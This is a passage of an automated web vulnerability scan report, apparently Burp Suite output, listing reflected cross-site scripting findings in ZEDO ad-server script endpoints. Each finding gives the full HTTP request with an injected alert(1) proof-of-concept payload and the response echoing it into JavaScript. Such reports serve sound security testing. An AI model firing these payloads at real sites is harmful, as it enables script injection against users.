1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=62
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:57 GMT
Connection: close
Content-Length: 2066

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='befbf";alert(1)//9c15c465b7a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=befbf";alert(1)//9c15c465b7a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                                   
...[SNIP]...

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12402'%3balert(1)//5f92dac5487 was submitted in the q parameter. This input was echoed as 12402';alert(1)//5f92dac5487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=12402'%3balert(1)//5f92dac5487&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1504B1120,1#886265|0,1,1;expires=Wed, 16 Mar 2011 01:14:58 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:58 GMT
Connection: close
Content-Length: 1925

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='12402';alert(1)//5f92dac5487';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=12402';alert(1)//5f92dac5487;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef81'%3balert(1)//7636571d18a was submitted in the $ parameter. This input was echoed as bef81';alert(1)//7636571d18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=bef81'%3balert(1)//7636571d18a&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:bef81';alert(1)//7636571d18a;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',bef81';alert(1)//7636571d18a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,bef81';alert(1)//7636571d18a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20c48"%3balert(1)//9211c166c4e was submitted in the $ parameter. This input was echoed as 20c48";alert(1)//9211c166c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=20c48"%3balert(1)//9211c166c4e&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:20c48";alert(1)//9211c166c4e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:59 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:59 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',20c48";alert(1)//9211c166c4e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,20c48";alert(1)//9211c166c4e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b5f'-alert(1)-'606f1eb024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?79b5f'-alert(1)-'606f1eb024=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:57 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=79b5f'-alert(1)-'606f1eb024=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c98b'%3balert(1)//05ebf60c76b was submitted in the q parameter. This input was echoed as 5c98b';alert(1)//05ebf60c76b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=5c98b'%3balert(1)//05ebf60c76b&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5c98b';alert(1)//05ebf60c76b';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=5c98b';alert(1)//05ebf60c76b;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a24e"%3balert(1)//78bd77ef7b2 was submitted in the q parameter. This input was echoed as 4a24e";alert(1)//78bd77ef7b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=4a24e"%3balert(1)//78bd77ef7b2&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
